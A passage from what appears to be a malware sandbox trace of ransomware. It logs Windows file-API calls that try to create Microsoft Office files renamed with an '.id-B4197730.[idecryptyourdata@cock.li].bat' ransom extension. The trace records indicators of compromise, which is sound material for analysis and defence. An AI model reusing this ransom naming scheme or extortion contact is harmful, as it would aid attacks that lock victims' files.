lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.288] CloseHandle (hObject=0x538) returned 1 [0175.288] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.288] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0175.288] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\Franklin Gothic.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\franklin gothic.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0175.289] CloseHandle (hObject=0x538) returned 1 [0176.057] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.058] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.groovemui.msi.16.en-us.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.groovemui.msi.16.en-us.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.058] CloseHandle (hObject=0x530) returned 1 [0176.093] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.093] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\Bibliography\\BIBFORM.XML.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\bibliography\\bibform.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.093] CloseHandle (hObject=0x544) returned 1 [0176.094] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.094] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\CollectSignatures_Init.xsn.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\collectsignatures_init.xsn.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.094] CloseHandle (hObject=0x544) returned 1 [0176.095] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.095] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.095] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\CollectSignatures_Sign.xsn.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\collectsignatures_sign.xsn.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.095] CloseHandle (hObject=0x544) returned 1 [0176.097] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.097] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\CT_ROOTS.XML.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\ct_roots.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.097] CloseHandle (hObject=0x544) returned 1 [0176.100] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.100] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DataServices\\+Connect to New Data Source.odc.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dataservices\\+connect to new data source.odc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.100] CloseHandle (hObject=0x544) returned 1 [0176.101] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.101] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.101] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DataServices\\+NewSQLServerConnection.odc.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dataservices\\+newsqlserverconnection.odc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.101] CloseHandle (hObject=0x544) returned 1 [0176.102] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.102] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DataServices\\DESKTOP.INI.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dataservices\\desktop.ini.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.102] CloseHandle (hObject=0x544) returned 1 [0176.103] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.103] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.103] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DBSAMPLE.MDB.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\dbsample.mdb.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.103] CloseHandle (hObject=0x544) returned 1 [0176.104] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.104] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\DEFAULT.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\default.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.104] CloseHandle (hObject=0x544) returned 1 [0176.105] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.105] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EADOCUMENTAPPROVAL_INIT.XSN.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\eadocumentapproval_init.xsn.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.105] CloseHandle (hObject=0x544) returned 1 [0176.106] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.106] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EADOCUMENTAPPROVAL_REVIEW.XSN.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\eadocumentapproval_review.xsn.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.106] CloseHandle (hObject=0x544) returned 1 [0176.107] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.107] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\EXPTOOWS.XLA.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\exptoows.xla.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.108] CloseHandle (hObject=0x544) returned 1 [0176.108] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.108] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.108] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\FOREST.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\forest.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.108] CloseHandle (hObject=0x544) returned 1 [0176.109] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.109] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GANTT.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\gantt.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.110] CloseHandle (hObject=0x544) returned 1 [0176.110] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.110] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.110] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\Invite or Link.one.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\invite or link.one.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.111] CloseHandle (hObject=0x544) returned 1 [0176.112] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.112] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.112] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\JADE.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\jade.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.112] CloseHandle (hObject=0x544) returned 1 [0176.113] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.114] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.114] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\NETWORK.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\network.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.114] CloseHandle (hObject=0x544) returned 1 [0176.115] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.115] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OCCMPVRD.XML.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\occmpvrd.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.115] CloseHandle (hObject=0x544) returned 1 [0176.116] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.116] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OCMODVRD.XML.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\ocmodvrd.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.116] CloseHandle (hObject=0x544) returned 1 [0176.117] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.117] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\officeinventoryagentfallback.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\officeinventoryagentfallback.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.117] CloseHandle (hObject=0x544) returned 1 [0176.118] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.118] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\officeinventoryagentlogon.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\officeinventoryagentlogon.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.118] CloseHandle (hObject=0x544) returned 1 [0176.121] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.121] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ONGuide.onepkg.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\onguide.onepkg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.121] CloseHandle (hObject=0x544) returned 1 [0176.122] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.122] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTFORM.DAT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outform.dat.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.122] CloseHandle (hObject=0x544) returned 1 [0176.123] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.123] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLPERF.H.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlperf.h.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.124] CloseHandle (hObject=0x544) returned 1 [0176.124] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.124] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLPERF.INI.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlperf.ini.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.125] CloseHandle (hObject=0x544) returned 1 [0176.125] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.125] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.125] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PASSPORT.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\passport.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.126] CloseHandle (hObject=0x544) returned 1 [0176.126] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.127] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PASTEL.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pastel.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.280] CloseHandle (hObject=0x544) returned 1 [0176.527] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.527] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.527] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME41.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme41.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.740] CloseHandle (hObject=0x530) returned 1 [0176.792] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.792] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.792] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR50F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir50f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.792] CloseHandle (hObject=0x54c) returned 1 [0176.793] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.793] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR20F.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir20f.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.793] CloseHandle (hObject=0x54c) returned 1 [0176.793] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0176.793] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, 